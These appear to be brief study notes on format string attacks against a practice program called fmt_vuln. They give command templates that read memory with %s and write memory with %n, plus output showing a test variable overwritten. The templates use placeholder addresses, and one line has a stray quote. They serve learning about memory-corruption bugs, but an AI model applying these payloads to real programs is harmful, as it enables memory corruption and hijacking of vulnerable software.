[+] Format string exploit code

[+] source name : fmt_vuln

[+] exploit code 

	./fmt_vuln $(printf '{getenv address}')%s

	%s is read memory

[+] Format string exploit code (%n)

[+] source name : fmt_vuln

[+] exploit code 

	./fmt_vuln $(printf '{getenv address}')%n

	%n is write the memory



[+] Format string exploit code (%n)

[+] source name : fmt_vuln

[+] exploit code 

	./fmt_vuln `python2 -c "print '{variable address}'*{byte number} +'%d%c%n'"`


	%n is write the memory

	%d size 2byte

	%c size 1byte

    [*] test_val @ 0x080e5068 = 170 0x000000aa
    ==> ./fmt_vuln $(printf "{function bytes}"")$(python2 -c "print 'a'*offset")%n